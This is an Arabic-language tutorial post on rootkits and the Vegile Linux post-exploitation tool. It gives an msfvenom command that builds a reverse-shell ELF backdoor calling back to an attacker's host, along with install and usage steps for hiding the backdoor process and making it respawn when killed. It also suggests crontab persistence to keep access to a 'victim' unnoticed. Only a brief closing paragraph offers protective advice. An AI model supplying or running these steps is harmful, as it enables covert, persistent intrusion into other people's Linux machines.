شرح أداة Vegile لانشاء backdoor-rootkit

شرح أداة Vegile لانشاء backdoor-rootkit

أداة تكوين الأبواب الخلفية والجذور الخفية واخفاء العمليات في لينكس


في هذا المقال سنتعرف على مفهوم الروتكيت ومخاطره, فكما تلاحظ فإن اخطر الفايروسات تستخدم هذة الطريقة للتخفي وحتى مكافحات الفيروسات تستخدم الروتكيت لحماية عملياتها من الاغلاق.

مفهوم الروتكيت Rootkit

كلمة الروتكيت تنقسم لقسمين
روت وتعني المستخدم الجذر مثل Root في نظام لينكس.
كيت أي تجميع عدة أجزاء.
عند تجميع الكلمتين نحصل على روتكيت و يعني البرامج التي تستهدف جذور المعالج "Kernel" أي النواة

تستخدم الروتكيت سواء في البرامج الضارة او البرامج العادية للحماية من كسر البرامج واخفاء اثار البرنامج من الجهاز مثل اخفاء اتصالات البرنامج او اخفاء العملية من مدير المهام...

ميزات rootkit هي كالتالي

1- إخفاء Files & Folders
2- اخفاء Processes
3- اخفاء المقابض Handles
4- اخفاء Registry Keys & Values
5- اخفاء Services
6- اخفاء TCP/UDP Sockets
7- اخفاء Systray Icons
امل انك قد اخذت نظرة عن الروت كيت حتى نبدأ موضوعنا ونتعرف على اداة Vegile لانشاء Backdoor و RootKit

Vegile - Ghost In The Shell

أداة Vegile هي أداة في اطار تقنيات ما بعد الاستغلال في لينكس. تضمن تقنيات ما بعد الاستغلال أن نحافظ على جهاز  الضحية مع مستوى معين من الامتيازات دون ان ينتبه الضحية للاختراق. 

ستعمل هذه الأداة على إعداد باكدور او الروتكيت, عند إعداد Backdoor سيتم إخفاء العملية المحددة (Backdoor Porocess) الخاصة بك وبهذا تحافظ على جلستك في metasploit بطريقة أمنة. 

حين ينتبه الضحية ويقوم بقتل العملية، سوف يعاد تشغيله مرة أخرى Persistence. هناك دائمًا عملية تقوم بالمراقبة أثناء تشغيل عملية أخرى، لذلك يمكننا أن نفترض أن هذه العملية لا يمكن إيقافها مثل Ghost in The Shell.

في الوقت الحالي ، قمت للتو بانشاء backdoor باستخدام الميتاسبلويت بالأمر msfvenom باستخدام reverse_shell. 

يمكنك استخدام برنامج thefatrat لمساعدتك في إنشاء باكدور بسهولة

msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST= اي بي LPORT= بورت -b "\ x00" -f elf -o اسم الباكدور

  • بالنسبة للعملية المخفية ، يمكنك استخدامها مع البرامج الخبيثة الاتية rootkits و backdoor و ransom و botnet  و python و perl و exe و binary.
  • تستهدف جميع توزيعات لينكس الضحية تشمل (bit32 و bit64)
  • لتثبيت الضحية بشكل احترافي ، يمكنك استخدام المهام المجدولة crontab و xinit.d في الباكدور الخاص بك

تثبيت أداة Vegile في كالي لينكس

git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
طريقة الاستعمال
شرح اداة Vegile
Vegile -i / --inject [backdoor/rootkit]
Vegile -u / --unlimited [backdoor/rootkit]
Vegile -h / --help
البرامتر i- يستخدم لحقن الروتكيت في الباكدور او Malware الذي انشأته.
البرامتر u- يستخدم لتثبيت العملية ومنع قتلها. فحتى لو قام الضحية باغلاقها سيتم اعادة تشغيل الباكدور من جديد بشكل لا نهائي unlimited

بشكل افتراضي ، سيتم استدعاء عملية الباب الخلفي screetsec على اسم منشئ الأداة ولن يساعد قتل العملية في إزالة الباب الخلفي حيث سيتم استعادته على الفور.

Vegile [ Post Exploitation in Linux ] - Unlimited sessions and unstopable backdoor

Vegile [ Post Exploitation in Linux ] - Hidden backdoor/rootkits in process


كيف تحمي نفسك من الروتكيت

لحماية نظامك من هجوم مماثل ، يجب على المستخدم :
  1. إجراء فحص منتظم لمكافحة البرامج الضارة باستخدام آخر تحديث للتوقيع للجذور الخفية والفيروسات ، 
  2. الحفاظ على تحديث نظام التشغيل وتطبيقات الطرف الثالث وعدم تنفيذ اي ملفات مشبوهة.